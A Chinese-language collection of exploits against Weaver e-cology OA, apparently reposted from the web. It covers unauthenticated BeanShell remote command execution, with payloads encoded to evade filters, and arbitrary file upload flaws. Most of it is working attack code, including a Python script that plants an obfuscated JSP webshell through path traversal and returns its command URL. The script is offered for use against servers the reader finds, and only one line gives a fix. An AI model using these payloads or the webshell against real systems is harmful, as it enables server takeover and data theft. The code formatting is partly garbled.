POC&EXP来源于网络
漏洞描述:
泛微e-cology OA系统的J**A Beanshell接口可以被未经授权访问,攻击者可以调用Beanshell接口,可以构造特定的HTTP绕过泛微本身的一些安全限制,实现远程命令执行
cnvd编号:CNVD-2019-32204
影响版本:e-cology <=9.0
漏洞修复:屏蔽/weaver/*目录的访问
漏洞复现:
1.漏洞路径:/weaver/bsh.servlet.BshServlet
2. 把print(“hello!”)换成exec(“whoami),可以测试能否测试,
执行系统命令。
Poc1:bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw
如果有全局过滤器过滤exec或eval,会有报错,
可以采用unicode绕过编码、字符串拼接等方式,见下图:
Poc2: bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw
Poc3:bsh.script=eval(“ex”+”ec(bsh.httpServletRequest.getParameter(”command”) )”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器
泛微OA
存在漏洞的路径为
/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
- 1
使用POC进行文件上传
python poc.py
import zipfileimport randomimport sysimport requests
def generate_random_str(randomlength=16):
random_str = ''
base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
length = len(base_str) - 1
for i in range(randomlength):
random_str += base_str[random.randint(0, length)]
return random_str
mm = generate_random_str(8)
webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1
def file_zip():
shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
""" ## 替换shell内容
zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
zf.writestr(webshell_name2, shell)
def GetShell(urllist):
file_zip()
# print('上传文件中')
urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
try:
requests.post(url=urls,files=file,timeout=60, verify=False)
GetShellurl = urllist+'/cloudstore/'+webshell_name1
GetShelllist = requests.get(url = GetShellurl)
if GetShelllist.status_code == 200:
print(GetShellurl+"?cmd=whoami")
except:
pass
GetShell("自己找的漏洞URL")漏洞位于: /page/exportImport/uploadOperation.jsp文件中
Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制
利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,
然后请求路径:
view-source:http://0.0.0.0:5006/page/exportImport/fileTransfer/1.jsp